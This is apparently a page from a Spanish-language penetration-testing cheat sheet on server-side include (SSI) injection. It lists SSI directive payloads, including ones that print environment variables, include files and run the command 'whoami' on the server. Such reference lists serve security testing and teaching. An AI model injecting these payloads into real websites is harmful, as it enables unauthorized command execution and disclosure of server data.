Server-side include (SSI) injection

# Fecha
<!--#echo var="DATE_LOCAL" -->

# Fecha de modificación de un archivo
<!--#flastmod file="index.html" -->

# Resultados de un programa CGI
<!--#include virtual="/cgi-bin/counter.pl" -->

# Incluir un archivo virtual (mismo directorio)
<!--#include virtual="index.html" -->

# Incluir un archivo (mismo directorio)
<!--#include file="index.html" -->

# Ejecutar comando
<!--#exec cmd="whoami" -->

# Imprimir todas las variables
<!--#printenv -->

# Configuración de variable
<!--#set var="name" value="MrW0l05zyn" -->

AnteriorServer-side template injection (SSTI)SiguienteServer-side request forgery (SSRF)

Última actualización hace 11 meses